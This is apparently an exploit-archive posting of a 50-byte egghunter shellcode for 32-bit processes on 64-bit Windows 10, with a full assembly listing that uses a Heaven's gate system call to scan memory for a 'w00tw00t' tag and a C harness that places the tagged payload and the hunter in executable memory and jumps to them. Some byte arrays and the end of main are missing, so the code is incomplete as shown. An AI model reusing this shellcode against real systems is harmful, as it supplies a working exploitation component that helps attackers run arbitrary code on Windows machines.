Windows/x64 (10) WoW64 Egghunter Shellcode

50 bytes small Windows/x64 (10) WoW64 egghunter shellcode.

MD5 | 2faba3b212b6eb54df90ce13b7ff49ff

#include <Windows.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
using namespace std;


Title: WoW64Egghunter for Windows 10 (32bit apps on 64bit Windows 10)
Size: 50 bytes
Date: 26/08/2018
Author: n30m1nd -
Works in: 32 bit processes on a 64 bit Windows 10 OS
How to: Compile under Visual Studio and run

Credit where credit is due:

Shouts out to the Plakkers!

// Assembly

0: 8c cb mov ebx,cs
2: 80 fb 23 cmp bl,0x23
5: 33 d2 xor edx,edx
7: 66 81 ca ff 0f or dx,0xfff
c: 33 db xor ebx,ebx
e: 42 inc edx
f: 52 push edx
10: 53 push ebx
11: 53 push ebx
12: 53 push ebx
13: 6a 29 push 0x29
15: 58 pop eax
16: b3 c0 mov bl,0xc0 ; Heaven's gate
18: 64 ff 13 call DWORD PTR fs:[ebx]
1b: 83 c4 0c add esp,0xc
1e: 5a pop edx
1f: 3c 05 cmp al,0x5
21: 74 e4 je 0x7
23: b8 77 30 30 74 mov eax,0x74303077
28: 89 d7 mov edi,edx
2a: af scas eax,DWORD PTR es:[edi]
2b: 75 e1 jne 0xe
2d: af scas eax,DWORD PTR es:[edi]
2e: 75 de jne 0xe
30: ff e7 jmp edi

char n30m1ndhunter[] =

// msfvenom -p windows/exec cmd=calc.exe -f c
char scode[] = "w00tw00t" // Eggu

int main(int argc, char **argv)
// Place the eggu (w00tw00t) in memory and make the shellcode executable
void *eggfind = VirtualAlloc(0, sizeof scode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(eggfind, scode, sizeof scode);

// Place the egghunter shellcode in memory and ...
void *exec = VirtualAlloc(0, sizeof n30m1ndhunter, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, n30m1ndhunter, sizeof n30m1ndhunter);

// ... jump to it

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